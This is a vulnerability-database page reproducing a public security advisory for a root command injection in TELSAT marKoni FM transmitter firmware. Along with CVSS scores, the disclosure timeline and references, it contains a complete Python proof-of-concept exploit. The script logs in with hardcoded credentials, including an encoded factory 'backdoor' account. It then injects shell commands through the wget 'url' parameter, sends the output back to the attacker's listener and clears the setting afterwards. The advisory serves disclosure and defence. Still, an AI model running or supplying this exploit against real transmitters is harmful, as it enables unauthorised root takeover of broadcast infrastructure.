Gjoko KrsticZSL-2024-5808TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS4
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N
AI Score
Confidence
Low
EPSS
Percentile
19.6%
Title: TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
Advisory ID: ZSL-2024-5808
Type: Local/Remote
Impact: System Access, Elevation of Privilege, DoS, Security Bypass
Risk: (5/5)
Release Date: 30.01.2024
Summary
Professional FM transmitters.
Description
The marKoni FM transmitters are susceptible to unauthenticated remote code execution with root privileges. An attacker can exploit a command injection vulnerability by manipulating the Email settings’ WAN IP info service, which utilizes the ‘wget’ module. This allows the attacker to gain unauthorized access to the system with administrative privileges by exploiting the ‘url’ parameter in the HTTP GET request to ekafcgi.fcgi.
Vendor
TELSAT Srl - <https://www.markoni.it>
Affected Version
Markoni-D (Compact) FM Transmitters
Markoni-DH (Exciter+Amplifiers) FM Transmitters
Markoni-A (Analogue Modulator) FM Transmitters
Firmware: 1.9.5
1.9.3
1.5.9
1.4.6
1.3.9
Tested On
GNU/Linux 3.10.53 (armv7l)
icorem6solox
lighttpd/1.4.33
Vendor Status
[10.11.2023] Vulnerability discovered.
[21.11.2023] Contact with the vendor.
[22.11.2023] No response from the vendor.
[19.01.2024] Contact with the vendor.
[29.01.2024] No response from the vendor.
[30.01.2024] Public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5809.php>
[2] <https://packetstormsecurity.com/files/176933/>
[3] <https://www.exploit-db.com/exploits/51906>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/286366>
[5] <https://www.cisa.gov/news-events/ics-advisories/icsa-24-179-01>
[6] <https://vulners.com/cve/CVE-2024-39373>
[7] <https://nvd.nist.gov/vuln/detail/CVE-2024-39373>
Changelog
[30.01.2024] - Initial release
[01.02.2024] - Added reference [2]
[19.03.2024] - Added reference [3]
[28.03.2024] - Added reference [4]
[01.07.2024] - Added reference [5], [6] and [7]
Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/env python
#
#
# TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
#
#
# Vendor: TELSAT Srl
# Product web page: https://www.markoni.it
# Affected version: Markoni-D (Compact) FM Transmitters
# Markoni-DH (Exciter+Amplifiers) FM Transmitters
# Markoni-A (Analogue Modulator) FM Transmitters
# Firmware: 1.9.5
# 1.9.3
# 1.5.9
# 1.4.6
# 1.3.9
#
# Summary: Professional FM transmitters.
#
# Desc: The marKoni FM transmitters are susceptible to unauthenticated
# remote code execution with root privileges. An attacker can exploit
# a command injection vulnerability by manipulating the Email settings'
# WAN IP info service, which utilizes the 'wget' module. This allows
# the attacker to gain unauthorized access to the system with administrative
# privileges by exploiting the 'url' parameter in the HTTP GET request
# to ekafcgi.fcgi.
#
# -------------------------------------------------------------------------
# [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami
# Authentication successful for backdoor
# Injecting command: whoami
# Listening on port 9999
# ('10.0.8.3', 47302) called back
# Received: root
# Housekeeping...
# Zya and thanks for stopping by!
#
# [lqwrm@metalgear ~]#
#
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
# icorem6solox
# lighttpd/1.4.33
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2024-5808
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php
#
#
# 10.11.2023
#
from colorama import init, Fore
import re,os,sys,requests
import socket,threading
from time import sleep
init()
def just_listen_to_me(lport, cstop):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
print("Listening on port " + str(lport))
try:
conn, addr = s.accept()
print(addr, "called back")
cstop.set()
except socket.timeout:
print("Call return timeout\nCheck your ports")
conn.close()
while True:
try:
odg = conn.recv(1771).decode()
uam = re.search(r"User-Agent:\s*(.*)", odg)
if uam:
uav = uam.group(1)
print(f"Received: {uav}")
exit()
else:
print("No output for you")
except:
print("Housekeeping...")
exit()
s.close()
def authenticate(ipaddr, option): #### Encrypted Shit ####_"
auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"
ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"
if option == "user": ##################################"
username = "\x75\x73\x65\x72" #####################"
password = "\x75\x73\x65\x72" #####################"
elif option == "admin": ###############################"
username = "\x61\x64\x6D\x69\x6E" #################"
password = "\x61\x64\x6D\x69\x6E" #################"
elif option == "backdoor": ############################"
username = "\x66\x61\x63\x74\x6F\x72\x79" #########"
password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"
authp = {
'username': username,
'password': password
}
resp = requests.get(auth_url + ep + "1", params=authp)
if "Set-Cookie" in resp.headers:
print(f"Authentication successful for {option}")
auth_cookie = resp.headers["Set-Cookie"].split(";")[0]
return auth_cookie
else:
print(f"Authentication failed for {option}.")
print("Try a different option.")
return None
def execute(ipaddr, cookie, command, listen_ip):
print(f"Injecting command: {command}")
ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"
dva = f"http://{ipaddr}{ep}27"
tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="
clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"
headers = {"Cookie": cookie}
requests.get(eden, headers=headers)
sleep(2)
requests.get(dva, headers=headers)
sleep(2)
requests.get(tri, headers=headers)
sleep(1)
requests.get(clear, headers=headers)
print("Zya and thanks for stopping by!")
exit(0)
def njaaah(text):
columns = os.get_terminal_size().columns
print(text.center(columns))
zsl = "\033[91mWaddup!\033[0m" #Win64
mrjox = f"""
________
/ \\
/ ____ \\
| / 0 \\ |
| \\______/ |
\\____________/ {zsl}
| |
/ \\
/ O \\
| O \\
| \\
| \\
|_________|
"""
if len(sys.argv) != 5:
print()
print("This is a PoC script for the marKoni transmitters 0day")
print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")
print("Option: 'user', 'admin', 'backdoor'")
print("Default listening port: 9999")
njaaah(mrjox)
exit()
ipaddr = sys.argv[1]
opt = sys.argv[2]
listen_ip = sys.argv[3]
command = sys.argv[4]
opt_map = {
"admin" : "admin",
"user" : "user",
"backdoor" : "backdoor"
}
if opt in opt_map:
auth_cookie = authenticate(ipaddr, opt_map[opt])
if auth_cookie:
cstop = threading.Event()
lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))
lt.start()
execute(ipaddr, auth_cookie, command, listen_ip)
cstop.set()
lt.join()
else:
print("Invalid option.")
</command></listen_ip></option></target_ip:port></p></body></html>Related
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS4
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N
AI Score
Confidence
Low
EPSS
Percentile
19.6%